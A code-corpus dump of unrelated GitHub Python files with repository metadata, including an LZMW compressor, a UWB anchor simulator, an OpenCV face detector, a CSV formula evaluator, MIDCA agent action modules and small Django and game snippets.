(x, y) = id
results = [(x + 1, y), (x, y - 1), (x - 1, y), (x, y + 1)]
if (x + y) % 2 == 0: results.reverse() # aesthetics
results = filter(self.in_bounds, results)
results = filter(self.passable, results)
return results
class GridWithWeights(SquareGrid):
def __init__(self, width, height):
super().__init__(width, height)
self.weights = {}
def cost(self, from_node, to_node):
return self.weights.get(to_node, 1)
class PriorityQueue:
def __int__(self):
self.elements = []
def empty(self):
return len(self.elements) == 0
def put(self, item, priority):
heapq.heappush(self.elements, (priority, item))
def get(self):
return heapq.heappush(self.elements)[1]
# TODO start implementation at 1.3.3 SEARCH
# example_graph = SimpleGraph()
# example_graph.edges = {
# 'A': ['B'],
# 'B': ['A', 'C', 'D'],
# 'C': ['A'],
# 'D': ['E', 'A'],
# 'E': ['B'],
# }
g = SquareGrid(30, 15)
g.walls =
def breadth_first_search_1(graph, start):
# print out what we find
frontier = Queue()
frontier.put(start)
came_from = {}
came_from[start] = None
while not frontier.empty():
current = frontier.get()
if current == goal():
break
for next in graph.neighbors(current):
if next not in came_from:
frontier.put(next)
came_from[next] = True
return came_from
breadth_first_search_1(example_graph, "A")
|
[
"isoybean@gmail.com"
] |
isoybean@gmail.com
|
098d337ffef7cf815b953a5de956a51ed097c7e9
|
00f5c993537b49e415db9e0010679fc56b3d9239
|
/LZMW.py
|
177a3064fe6671bcfd7c7fa1ef7987ecffcc379c
|
[] |
no_license
|
rgkaw/LZW-LZMW-and-LZAP
|
e0980d4d540fe6c40c658f77b74ed31caa603f5e
|
ea0caafacdc529fa36d4c33d19ef2f20182224a8
|
refs/heads/main
| 2023-06-02T06:09:47.458065
| 2021-06-22T17:26:13
| 2021-06-22T17:26:13
| 378,699,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,117
|
py
|
def encode(array):
last=256
i=0
array_len=len(array)
prev_match=b''
match=b''
out=[]
while(i<array_len):
match=bytes([array[i]])
while(match in dictionary):
i=i+1
try:
match=match+bytes([array[i]])
except:
match=match+bytes([array[i-1]])
break
match=match[:-1]
out.append(dictionary[match])
if(prev_match+match) not in dictionary:
x=match
dictionary[prev_match+match]=last
last+=1
prev_match=match
return out
def output_to_bytes(array):
i=0
bits=0
bit_chunks=0
#max length in decimal
mldec=max(array)
#max length in binary
mlbin=1
x=mldec
out=[]
while x>1:
x=x>>1
mlbin+=1
out.append(mlbin)
while i<len(array):
while bits<=mlbin:
j=array[i]
i=i+1
x=j
bit_chunks=(bit_chunks<<mlbin)|j
bits=bits+mlbin
if i>=len(array):
break
while bits>=8:
bits=bits-8
temp=bit_chunks>>(bits)
out.append(temp)
bit_chunks=bit_chunks&((2**(bits))-1)
if i>=len(array):
if(bits!=0):
padding=8-bits
bit_chunks=(bit_chunks<<(padding))|((2**padding)-1)
out.append(bit_chunks)
out.append(padding)
else:
out.append(0)
return bytes(out)
from time import sleep
def get_string(idx):
a=b''
for i in dictionary:
if dictionary[i]==idx:
a=i
return a
def decode(array):
out=b''
match=b''
prev_match=b''
last=256
try:
for i in array:
match=get_string(i)
out=out+match
x=b''
x=(prev_match)+match
if x not in dictionary:
dictionary[x]=last
last+=1
prev_match=match
except:
out=out+(get_string(i))
return out
def bytes_to_int(array):
out=[]
byte_chunk=0
bits=0
length=array[0]
padding=array[-1]
array=array[1:-1]
size=len(array)
i=0
while i<size-1:
while (bits<length) & (i<size-1):
#print(array[i])
#sleep(1)
#print(type(byte_chunk))
byte_chunk=(byte_chunk<<8)+array[i]
bits=bits+8
i+=1
# print('1',byte_chunk,bits)
while bits>=length:
bits=bits-length
temp=byte_chunk>>(bits)
out.append(temp)
byte_chunk=byte_chunk&((2**bits)-1)
byte_chunk=(byte_chunk<<8)+array[i]
byte_chunk=byte_chunk>>padding
out.append(byte_chunk)
return out
def compress():
print('You choose to compress file. Place file to compress in the same directory as this program.')
input_file=str(input("Input file (ex :file.txt): "))
f=open(file=input_file,mode='r+b')
input_=f.read()
file_name=''
for i in input_file:
if i == '.':
break
file_name=file_name+i
print("making dictionary...")
#make dictionary
dictionary={bytes([i]):i for i in range(256)}
print("\tinput size\t: ",len(input_),'bytes')
print("compressing...")
output=encode(input_)
print("converting to bytes...")
#convert output list into bytes
output=output_to_bytes(output)
print("saving file....")
print("\toutput size:\t",len(output),"bytes")
#WRITE FILE OUTPUT
f=open(file=file_name+'.LZMW',mode='w+b')
f.write(output)
f.close()
print("done!!")
def decompress():
print('You choose to decompress file. Place file to decompress in the same directory as this program.')
input_file=input(str("Input file (ex :file.LZMW): "))
file_name=''
for i in input_file:
if i == '.':
break
file_name=file_name+i
f=open(file=input_file,mode='r+b')
input_=f.read()
print("\tfile size: ",len(input_),'bytes')
print("preparing files...")
input_=bytes_to_int(input_)
print("creating dictionary...")
dictionary={bytes([i]):i for i in range(256)}
print("decompressing...")
output=decode(input_)
print("done!")
print("\toutput size:\t",len(output),'\n')
f=open(file=file_name+'_LZMW.txt',mode='w+b')
f.write(output)
f.close()
while True:
dictionary={bytes([i]):i for i in range(256)}
try:
choice=int(input("1. compress\n2. decompress\n0. exit\n\tyour choice:"))
try:
if choice==1:
compress()
elif choice==2:
decompress()
elif choice==0:
break
else:
print("invalid input")
except:
print('cannot find file...')
except:
print("invalid input (not integer)")
|
[
"noreply@github.com"
] |
noreply@github.com
|
aed20090029a8657ee670be14f222021220a3fbf
|
1bdfc75a73cf424154e1eeeca2d77ada1548197c
|
/xinxi2.py
|
a3e54ba697bf74173f4ec34237963edf27c07077
|
[] |
no_license
|
15921970316/test_chor_new
|
6320d74ab92c3d8d8801c8086ff8b91b1fb85c12
|
8eba96786d5885027c979aa89a356d25a2a0a822
|
refs/heads/main
| 2023-01-19T23:32:14.586241
| 2020-11-26T02:44:56
| 2020-11-26T02:44:56
| 316,100,256
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,026
|
py
|
import datetime
import socket
import cou
import unit
from api.sk2 import xintiao, zhuce, CCPTX_Report, CCPRX_Report, BLINK_Report
import threading
import time
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
Rx_seq=0
tts=0
Blink_seq=0
Blink_tts=0
filename = unit.BASE_DIR + "\data\Data.json"
anchor_cfg_list = unit.read_name_data2(filename, "anchor_cfg")
list = []
for i in anchor_cfg_list:
list.append(i)
# 分类接受打印引擎返回信息
def Recv_info(ms):
# print('分类接收打印引擎返回信息', ms)
global bs
try:
if ms == b'':
...
elif ms == 0 or ms == None:
print("连接失败")
elif ms[0] == 0x21:
...
# print("基站心跳包2:",hex(ms[0]),ms)
elif ms[0] == 0x43:
print("配置基站2定位参数:",hex(ms[0]),hex(ms[1]),hex(ms[2]))
elif ms[0] == 0x44:
print("配置基站2射频参数:",hex(ms[0]))
elif ms[0] == 0x57:
cou.rtls = 1
print('2定位开始:', hex(ms[0]), ms[1])
if ms[1]==1:
bs=1
elif ms[1]==0:
bs=0
else:
bs=3
elif ms[0] == 0x45:
print("配置基站2天线延迟参数:",hex(ms[0]) )
else:
print(" 2其他参数:", hex(ms[0]))
# ms.hex().encode(encoding="utf-8"))
except Exception as e:
print('服务器连接失败--2', e)
# 标签信息 无返回值
def Blink_info():
# 读取标签的addr文件
filename = unit.BASE_DIR + "\data\Data.json"
json1 = unit.read_name_data2(filename, "Tag_Addr_XYZ")
# json2 = unit.read_name_data(filename, "Blik_time")
# Blink_time=1/float(json2[0][0])
# print('2基站Blink发送频率为:{}HZ'.format(json2[0][0]))
X=-1
while True:
sep_c = Blink_seq
time1 = Blink_tts
if X != sep_c:
# time1 = cou.time2
try:
n = 0
for Tag_Addr in json1:
tt = time1+ cou.BINK(Tag_Addr[1][0], Tag_Addr[1][1], 2) - cou.BINK(
Tag_Addr[1][0], Tag_Addr[1][1], 1)
sk.send(BLINK_Report(sep_c, Tag_Addr[0], tt))
n += 1
# def anchor1():
# tt = cou.BINK(90, 90, 2) - cou.BINK(90, 90, 1)
# sk.send(BLINK_Report(sep_c, addr1, time1 + tt+1))
#
# def anchor2():
# tt = cou.BINK(50, 50, 2) - cou.BINK(50, 50, 1)
# sk.send(BLINK_Report(sep_c, addr2, time1 + tt+4))
#
# def anchor3():
# tt = cou.BINK(20, 20, 2) - cou.BINK(20, 20, 1)
# sk.send(BLINK_Report(sep_c, addr3, time1 + tt+12))
#
# t1 = threading.Thread(target=anchor1)
# t2 = threading.Thread(target=anchor2)
# t3 = threading.Thread(target=anchor3)
# t1.start()
# t2.start()
# t3.start()
X = sep_c
except Exception as e:
print('服务器连接失败--222', e)
# 在启动TDOA定位后,所有的基站都会向定位引擎发送时间同步包接收报告
def CCPRX_Report2():
Rxseq = -1
x=0
while True:
while True:
x=Rx_seq
if Rxseq!=x:
try:
t=tts+ cou.BINK(list[1][1][0], list[1][1][1], 0)
# print('CCPTX_Report2----', x, t)
sk.send(CCPRX_Report(x, t,list[0][0]))
cou.time2=t
# t = cou.time3 + int(0.15 * 499.2e6 * 128.0)
Rxseq = Rx_seq
break
except Exception as e:
print('CCPRX_Report2', e)
else:
...
#计时器
def time_x():
t = 0b0000000000000000000000000000001100000011
while True:
if t >= 1099511627775:
t = 0b0000000000000000000000000000000000000000
cou.time2=0
# report_name = os.path.dirname(os.path.abspath(__file__)) + "/report/test_info.html"
# time.sleep(0.1)
cou.time2=cou.time2+1
t+=1
# 心跳间隔是2秒 2秒发送一个心跳包并且收到引擎一个心跳回访 一旦超时未收到双方连接立即中断
def xintiao2():
i = 0
while True:
try:
sk.send(xintiao())
ms = sk.recv(1024)
Recv_info(ms)
i += 1
time.sleep(5)
except Exception as e:
print('服务器连接失败--2', e)
break
while True:
try:
filename = unit.BASE_DIR + "\data\Data.json"
json = unit.get_json_data(filename)
sk.connect((json["ip"],json['port']))
sk.send(zhuce(list[1][0]))
# print('次基站2注册信息包', zhuce())
ms = sk.recv(1024)
Recv_info(ms)
## 属于线程t的部分
t1 = threading.Thread(target=xintiao2)
t2 = threading.Thread(target=Blink_info)
t3 = threading.Thread(target=CCPRX_Report2)
# t4 = threading.Thread(target=time_x)
t1.start()
# t4.start()
while True:
if cou.rtls==1:
t3.start()
t2.start()
break
break
except Exception as e:
print('服务器连接失败--', e)
## 属于线程t的部分
# t1.join() # join是阻塞当前线程(此处的当前线程时主线程) 主线程直到Thread-1结束之后才结束
# t2.join()
|
[
"noreply@github.com"
] |
noreply@github.com
|
0168ac897bdf4a2f1b3a7c34a176bb31fecce4a7
|
cee42277672cbcc3a354b7feb604ce5ff9ae05eb
|
/face_recognition_windows/src/face_detected_haar.py
|
821fd7c47790fe94965979392f7a3e1604f7936d
|
[] |
no_license
|
linhhonblade/face_recognition_project
|
2ef9aa93475403c1b2dba1e4ae2347fc95c9a6a9
|
59f235a3f29d8a01599f20569e0eb7ebf0a63fd4
|
refs/heads/master
| 2020-04-08T01:59:26.584120
| 2018-11-21T14:37:08
| 2018-11-21T14:37:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,071
|
py
|
import cv2
#push image to memory for processing
def ImagePush():
path=input('link of image: ')
if path=="":
path='../../image/face_2.jpg'
img=cv2.imread(path,0)
return img
#show image
def ImageShow(img):
cv.imshow('image',img)
k=cv.waitKey()
while k!=ord('q'):
k=cv.waitKey()
#import module face using haar
def ImageDetect(img,mode=0):
if mode==0:
Module=input('link trained module: ')
else:
Module=''
if Module=='':
Module='../../haarcascades/haarcascade_frontalface_default.xml'
face_haar=cv2.CascadeClassifier(Module)
face=face_haar.detectMultiScale(img,1.1,5)
#print("Number of face is: ",len(face))
#print("local of point is: ",face)
if not mode==0:
return face
#add text to image
def face_draw_text(img,matrix,text):
(x,y,w,h)=matrix[0]
cv2.putText(img,text,(x,y),cv2.FONT_HERSHEY_PLAIN,1.5,(0, 255, 0), 2)
#add rectangle to image
def face_draw_rectangle(img,face):
for(x,y,w,h) in face:
cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)
|
[
"lenhuchuhiep99@gmail.com"
] |
lenhuchuhiep99@gmail.com
|
16df41a61ad44e7d25d5d072c4382cdc29cedec8
|
0f932e961983e310cf6c12608d55cfc526be55ad
|
/hw1.py
|
7b0de8e27706ce210cdfb6657974f387b15e604a
|
[] |
no_license
|
alexandrov-nikita/homework1_hse
|
00a65e738571858b1bd91065bba028138183dc21
|
e33365f987fdc21bd607572d8e46bce4bfcb7b77
|
refs/heads/master
| 2021-01-19T19:26:43.052243
| 2016-02-29T09:01:19
| 2016-02-29T09:01:19
| 52,109,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
import csv
import sys
import math
import imp
import os
def read_data(file_name):
return list(csv.reader(open(file_name, 'rt')))
def create_dictionary(data, output):
dict = {}
for index_row, row in enumerate(data):
for index_column, cell in enumerate(row):
if cell[0] != '=':
dict[chr(ord('A') + index_column) + str(index_row + 1)] = cell
return dict
def change_for_func(commands_list, module_name, cell):
new_cell = cell
for command in commands_list:
new_cell = new_cell.replace(command + '(', module_name + command + '(')
return new_cell
def calculate(dict, output):
for index_row, row in enumerate(data):
for index_column, cell in enumerate(row):
if cell[0] == '=':
cell = change_for_func(math_commands, 'math.', cell)
cell = change_for_func(module_commands, "module.", cell)
cell = cell[1:]
for known_cell, item in dict.items():
if item.isdigit() or item.replace('.', '' ,1).isdigit():
cell = cell.replace(known_cell, item)
else:
cell = cell.replace(known_cell, '\"' + item + '\"')
try:
output[index_row][index_column] = eval(cell)
except Exception as exc:
output[index_row][index_column] = "ERROR"
def write_data(output_name, output_table):
c = csv.writer(open(output_name, "w"))
for row in output_table:
c.writerow(row)
def module_preparation():
module_commands = []
for command in dir(module):
if command[0] != '_':
module_commands.append(command)
return module_commands
data = read_data(sys.argv[1])
if (len(sys.argv) > 3):
module_name = sys.argv[3]
module = imp.load_source(module_name, os.getcwd() + '/' + module_name)
module_commands = module_preparation()
else:
module_commands = []
output = data
dict = create_dictionary(data, output)
math_commands = dir(math)
calculate(dict, output)
write_data(sys.argv[2], output)
|
[
"alexandrov-nikita@yandex.ru"
] |
alexandrov-nikita@yandex.ru
|
9024d6d29a05f047350bb653f30fa1105ce5e289
|
8ded9e9a614064489e999316fc79f517e0c1bc1b
|
/midca/modules/act.py
|
ffd81a660e2cdf427234cdbddf3511e5ee5ca96b
|
[] |
no_license
|
COLAB2/GraceMIDCA
|
32553b958c46d8a1ee043d1ff5c1d6fb908cc942
|
43925081dfb19088fb3454c36a5286789fe9c140
|
refs/heads/master
| 2020-07-07T03:20:37.468101
| 2020-03-30T23:37:02
| 2020-03-30T23:37:02
| 203,229,031
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,720
|
py
|
from midca.modules._plan.asynch import asynch
from midca import base
import copy
class AsynchronousAct(base.BaseModule):
'''
MIDCA module that "executes" plans in which the individual actions will be conducted
asynchronously. This was originally designed to allow MIDCA to work as a robot
controller in communication with ROS sensor and effector nodes.
'''
def run(self, cycle, verbose = 2):
self.verbose = verbose
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)[-1]
except:
goals = []
if not goals:
if verbose >= 2:
print "No Active goals. Act phase will do nothing"
return
try:
plan = self.mem.get(self.mem.GOAL_GRAPH).getMatchingPlan(goals)
except:
if verbose >= 1:
print "Error loading plan. Skipping act phase."
return
if not plan:
if verbose > 2:
print "No current plan. Skipping Act phase"
return
i = 0
if plan.finished():
print "Plan", plan, "has already been completed"
return
# ideally MIDCA should check for other valid plans, but for now it doesn't.
while i < len(plan):
action = plan[i]
try:
if action.status != asynch.FAILED and action.status != asynch.COMPLETE:
completed = action.check_complete()
if completed:
self.mem.add(self.mem.ACTIONS, [action.midcaAction])
if verbose >= 2:
print "Action", action, "completed"
except AttributeError:
if verbose >= 1:
print "Action", action, "Does not seem to have a valid check_complete() ",
"method. Therefore MIDCA cannot execute it."
action.status = asynch.FAILED
try:
if action.status == asynch.NOT_STARTED:
if verbose >= 2:
print "Beginning action execution for", action
action.execute()
except AttributeError:
if verbose >= 1:
print "Action", action, "Does not seem to have a valid execute() ",
"method. Therefore MIDCA cannot execute it"
action.status = asynch.FAILED
if action.status == asynch.COMPLETE:
i += 1
elif not action.blocks:
i += 1
else:
break
class SimpleAct(base.BaseModule):
'''
MIDCA module that selects the plan, if any, that achieves the most current goals, then selects the next action from that plan. The selected action is stored in a two-dimensional array in mem[mem.ACTIONS], where mem[mem.ACTIONS][x][y] returns the yth action to be taken at time step x. So mem[mem.ACTIONS][-1][0] is the last action selected. Note that this will throw an index error if no action was selected.
To have MIDCA perform multiple actions in one cycle, simple add several actions to mem[mem.ACTIONS][-1]. So mem[mem.ACTIONS][-1][0] is the first action taken, mem[mem.ACTIONS][-1][1] is the second, etc.
'''
#returns the plan that achieves the most current goals, based on simulation.
def get_best_plan(self, world, goals, verbose):
plan = None
goalsAchieved = set()
goalGraph = self.mem.get(self.mem.GOAL_GRAPH)
for nextPlan in goalGraph.allMatchingPlans(goals):
achieved = world.goals_achieved(nextPlan, goals)
if len(achieved) > len(goalsAchieved):
goalsAchieved = achieved
plan = nextPlan
if len(achieved) == len(goals):
break
elif verbose >= 2:
print "Retrieved plan does not achieve all goals. Trying to retrieve a different plan..."
if verbose >= 3:
print " Retrieved Plan:"
for a in nextPlan:
print " "+str(a)
print "Goals achieved:", [str(goal) for goal in achieved]
if plan == None and verbose >= 1:
print "No valid plan found that achieves any current goals."
elif len(goalsAchieved) < len(goals) and verbose >= 1:
print "Best plan does not achieve all goals."
if verbose >= 2:
print "Plan:", str(plan)
print "Goals achieved:", [str(goal) for goal in goalsAchieved]
return plan
def run(self, cycle, verbose = 2):
self.verbose = verbose
max_plan_print_size = 5
world = self.mem.get(self.mem.STATES)[-1]
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)[-1]
except :
goals = []
plan = self.get_best_plan(world, goals, verbose)
trace = self.mem.trace
if trace:
trace.add_module(cycle,self.__class__.__name__)
trace.add_data("WORLD", copy.deepcopy(world))
trace.add_data("GOALS", copy.deepcopy(goals))
trace.add_data("PLAN", copy.deepcopy(plan))
if plan != None:
action = plan.get_next_step()
if not action:
if verbose >= 1:
print "Plan to achieve goals has already been completed. Taking no action."
self.mem.add(self.mem.ACTIONS, [])
else:
if verbose == 1:
print "Action selected:", action
elif verbose >= 2:
if len(plan) > max_plan_print_size:
# print just the next 3 actions of the plan
print "Selected action", action, "from plan:\n"
if verbose >= 3:
for a in plan:
print " "+str(a)
else:
# print the whole plan
print "Selected action", action, "from plan:\n", plan
self.mem.add(self.mem.ACTIONS, [action])
actions = self.mem.get(self.mem.ACTIONS)
if len(actions) > 400:
actions = actions[200:] # trim off old stale actions
self.mem.set(self.mem.ACTIONS, actions)
#print "Trimmed off 200 old stale actions to save space"
plan.advance()
if trace: trace.add_data("ACTION", action)
else:
if verbose >= 1:
print "MIDCA will not select an action this cycle."
self.mem.add(self.mem.ACTIONS, [])
if goals:
for g in goals:
self.mem.get(self.mem.GOAL_GRAPH).remove(g)
if trace: trace.add_data("ACTION", None)
class SimpleAct_temporary(base.BaseModule):
'''
For both construction and restaurant domain
MIDCA module that selects the plan, if any, that achieves the most current goals, then selects the next action from that plan. The selected action is stored in a two-dimensional array in mem[mem.ACTIONS], where mem[mem.ACTIONS][x][y] returns the yth action to be taken at time step x. So mem[mem.ACTIONS][-1][0] is the last action selected. Note that this will throw an index error if no action was selected.
To have MIDCA perform multiple actions in one cycle, simple add several actions to mem[mem.ACTIONS][-1]. So mem[mem.ACTIONS][-1][0] is the first action taken, mem[mem.ACTIONS][-1][1] is the second, etc.
'''
# returns the plan that achieves the most current goals, based on simulation.
def get_best_plan(self, world, goals, verbose):
plan = None
goalsAchieved = set()
goalGraph = self.mem.get(self.mem.GOAL_GRAPH)
for nextPlan in goalGraph.allMatchingPlans(goals):
achieved = world.goals_achieved(nextPlan, goals)
if len(achieved) > len(goalsAchieved):
goalsAchieved = achieved
plan = nextPlan
if len(achieved) == len(goals):
break
elif verbose >= 2:
print "Retrieved plan does not achieve all goals. Trying to retrieve a different plan..."
if verbose >= 3:
print " Retrieved Plan:"
for a in nextPlan:
print " " + str(a)
print "Goals achieved:", [str(goal) for goal in achieved]
if plan == None and verbose >= 1:
print "No valid plan found that achieves any current goals."
elif len(goalsAchieved) < len(goals) and verbose >= 1:
print "Best plan does not achieve all goals."
if verbose >= 2:
print "Plan:", str(plan)
print "Goals achieved:", [str(goal) for goal in goalsAchieved]
return plan
def run(self, cycle, verbose=2):
self.verbose = verbose
max_plan_print_size = 5
world = self.mem.get(self.mem.STATES)[-1]
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)
except:
goals = []
plan = self.get_best_plan(world, goals, verbose)
trace = self.mem.trace
if trace:
trace.add_module(cycle, self.__class__.__name__)
trace.add_data("WORLD", copy.deepcopy(world))
trace.add_data("GOALS", copy.deepcopy(goals))
trace.add_data("PLAN", copy.deepcopy(plan))
if plan != None:
action = plan.get_next_step()
if not action:
if verbose >= 1:
print "Plan to achieve goals has already been completed. Taking no action."
self.mem.add(self.mem.ACTIONS, [])
else:
if verbose == 1:
print "Action selected:", action
elif verbose >= 2:
if len(plan) > max_plan_print_size:
# print just the next 3 actions of the plan
print "Selected action", action, "from plan:\n"
if verbose >= 3:
for a in plan:
print " " + str(a)
else:
# print the whole plan
print "Selected action", action, "from plan:\n", plan
self.mem.add(self.mem.ACTIONS, [action])
actions = self.mem.get(self.mem.ACTIONS)
if len(actions) > 400:
actions = actions[200:] # trim off old stale actions
self.mem.set(self.mem.ACTIONS, actions)
# print "Trimmed off 200 old stale actions to save space"
plan.advance()
if trace: trace.add_data("ACTION", action)
else:
if verbose >= 1:
print "MIDCA will not select an action this cycle."
self.mem.add(self.mem.ACTIONS, [])
if goals:
for g in goals:
self.mem.get(self.mem.GOAL_GRAPH).remove(g)
if trace: trace.add_data("ACTION", None)
class NBeaconsSimpleAct(base.BaseModule):
'''
MIDCA module that selects the plan, if any, that achieves the most current goals, then selects the next action from that plan. The selected action is stored in a two-dimensional array in mem[mem.ACTIONS], where mem[mem.ACTIONS][x][y] returns the yth action to be taken at time step x. So mem[mem.ACTIONS][-1][0] is the last action selected. Note that this will throw an index error if no action was selected.
To have MIDCA perform multiple actions in one cycle, simple add several actions to mem[mem.ACTIONS][-1]. So mem[mem.ACTIONS][-1][0] is the first action taken, mem[mem.ACTIONS][-1][1] is the second, etc.
'''
def get_first_plan(self, goals):
goalGraph = self.mem.get(self.mem.GOAL_GRAPH)
plans = goalGraph.allMatchingPlans(goals)
for p in plans:
if p.finished():
goalGraph.removePlan(p)
if self.verbose >= 1:
print "Just removed finished plan "
for ps in p:
print " "+str(ps)
else:
return p
if self.verbose >= 1: print "Could not find an unfinished plan in get_first_plan() for goals "+str(goals)
return None
def run(self, cycle, verbose = 2):
self.verbose = verbose
max_plan_print_size = 10
world = self.mem.get(self.mem.STATES)[-1]
try:
goals = self.mem.get(self.mem.CURRENT_GOALS)[-1]
except:
goals = []
plan = self.get_first_plan(goals)
trace = self.mem.trace
if trace:
trace.add_module(cycle,self.__class__.__name__)
trace.add_data("WORLD", copy.deepcopy(world))
trace.add_data("GOALS", copy.deepcopy(goals))
trace.add_data("PLAN", copy.deepcopy(plan))
if plan != None:
action = plan.get_next_step()
if not action:
if verbose >= 1:
print "Plan to achieve goals has already been completed. Taking no action."
self.mem.add(self.mem.ACTIONS, [])
else:
if verbose == 1:
print "Action selected:", action
elif verbose >= 2:
if len(plan) > max_plan_print_size:
# print just the next 3 actions of the plan
print "Selected action", action, "from plan:\n"
if verbose >= 3:
for a in plan:
if action == a:
print " *"+str(a)
else:
print " "+str(a)
else:
# print the whole plan
print "Selected action", action, "from plan:\n"
for a in plan:
if action == a:
print " *"+str(a)
else:
print " "+str(a)
self.mem.add(self.mem.ACTIONS, [action])
plan.advance()
if trace: trace.add_data("ACTION", action)
else:
if verbose >= 1:
print "MIDCA will not select an action this cycle."
self.mem.add(self.mem.ACTIONS, [])
if trace: trace.add_data("ACTION", None)
class Moosact(base.BaseModule):
def init(self, world, mem):
context = zmq.Context()
self.publisher = context.socket(zmq.PUB)
self.publisher.bind("tcp://127.0.0.1:5560")
self.mem = mem
self.world = world
def run(self, cycle, verbose = 2):
try:
#get selected actions for this cycle. This is set in the act phase.
actions = self.mem.get(self.mem.ACTIONS)[-1]
except TypeError, IndexError:
if verbose >= 1:
print "Simulator: no actions selected yet by MIDCA."
return
if actions:
for action in actions:
if self.world.midca_action_applicable(action):
if verbose >= 2:
print "simulating MIDCA action:", action
if (action.op == "survey"):
argnames = [str(arg) for arg in action.args]
if ("ga1" in argnames):
self.publisher.send_multipart(
[b"M", b"polygon= radial:: x=20, y=-80, radius=20, pts=8, snap=1, label=DUDLEY_LOITER"])
self.world.apply_midca_action(action)
if ("ga2" in argnames):
self.publisher.send_multipart([b"M",b"polygon= radial:: x=150, y=-80, radius=20, pts=8, snap=1, label=DUDLEY_LOITER"])
self.world.apply_midca_action(action)
if ("home" in argnames):
self.publisher.send_multipart([b"M", b"point = 0,0"])
self.world.apply_midca_action(action)
else:
if verbose >= 1:
print "MIDCA-selected action", action, "illegal in current world state. Skipping"
else:
if verbose >= 2:
print "No actions selected this cycle by MIDCA."
|
[
"sravyachowdary1994@gmail.com"
] |
sravyachowdary1994@gmail.com
|
52519de05a1705498f59ab6900fec766342624d4
|
cf98e53c7d74a717a1ccb60d10396f78f2572f82
|
/EMP/EMP/wsgi.py
|
fe7dbac48b66751c7e61d86fbc255de82dec892e
|
[] |
no_license
|
mkm1997/ESCALE
|
f09cb18b0b26ea94bfaccbd10eee3fe81d0d9ee9
|
99a163b25b57d57fb6412a172dd4c51fb0f7ee8a
|
refs/heads/master
| 2020-03-19T05:24:30.592902
| 2018-06-03T17:59:10
| 2018-06-03T17:59:10
| 135,927,715
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
"""
WSGI config for EMP project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "EMP.settings")
application = get_wsgi_application()
|
[
"mmanish184@gmail.com"
] |
mmanish184@gmail.com
|
d9f3996fc6b6e11676bb6d73c8c96a5562d5fcec
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/Scaleform/daapi/view/lobby/tank_setup/ammunition_setup_vehicle.py
|
572f09c20630d76920f59564d58da4e89187b639
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 972
|
py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/tank_setup/ammunition_setup_vehicle.py
from CurrentVehicle import g_currentVehicle
from helpers import dependency
from skeletons.gui.shared import IItemsCache
class _TankSetupVehicle(object):
__slots__ = ('__vehicle',)
_itemsCache = dependency.descriptor(IItemsCache)
def __init__(self):
super(_TankSetupVehicle, self).__init__()
self.__vehicle = None
return
def setVehicle(self, value):
self.__vehicle = value
@property
def item(self):
return self.__vehicle or g_currentVehicle.item
@property
def defaultItem(self):
return g_currentVehicle.item if g_currentVehicle.isPresent() else None
def isPresent(self):
return self.__vehicle is not None
def dispose(self):
self.__vehicle = None
return
g_tankSetupVehicle = _TankSetupVehicle()
|
[
"StranikS_Scan@mail.ru"
] |
StranikS_Scan@mail.ru
|
223fdee3194358515d95388c141e4d2e97b7c2c5
|
6fecc74a147ff8c3966bb94a491aae6e26e3b439
|
/config/base_config.py
|
77bf7e15d09abb7d10e3997aa2fec34c61bdfb4a
|
[] |
no_license
|
lukang287/ws
|
13adddc0a7e2b8b920137972f132ec8df2d135ba
|
26626849c683caa89489939b279c50116e77baf9
|
refs/heads/master
| 2020-04-20T06:11:56.843679
| 2019-02-01T09:46:12
| 2019-02-01T09:46:12
| 168,676,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
WS_SERVER_PORT_ONE = 5001
WS_SERVER_PORT_MUTIL = 5000
#MQ配置,queue用于一对一不丢失,topic用于发布订阅,一对多会丢失
MQ_BROKERS = [('106.13.4.172', 61613)]
LOG_QUEUE_NAME = '/queue/log'
CMD_QUEUE_NAME = '/queue/cmd'
NOTIFY_TOPIC_NAME = '/topic/notify'
|
[
"lukang@lightinthebox.com"
] |
lukang@lightinthebox.com
|
45be380484fe42397031b27daa726ba233ca0a75
|
1b66bcf36d7578c3b1dfb5b1ce1570aa46596072
|
/src/gameapp/round/controller.py
|
463728ed40731ec5f3b6700f0f698d67ba056882
|
[] |
no_license
|
germanoa/elyphoot
|
c8e2f225d0649bd522c52c97823bb895409ac2cf
|
8648a9584d5da03e31b899bad2db8842f0e50233
|
refs/heads/master
| 2016-09-10T19:02:45.576423
| 2012-06-22T22:06:08
| 2012-06-22T22:06:08
| 32,347,865
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,166
|
py
|
import gameapp.match.controller
import gameapp.season.controller
from gameapp.models import Round
def run_round(season, game_round):
if game_round is None or game_round.resolved:
return False
results = map(gameapp.match.controller.run_match, game_round.matches.all())
for r in results:
if r:
return True # algum match ainda nao esta resolvido
game_round.resolved = True
game_round.save()
if season is not None:
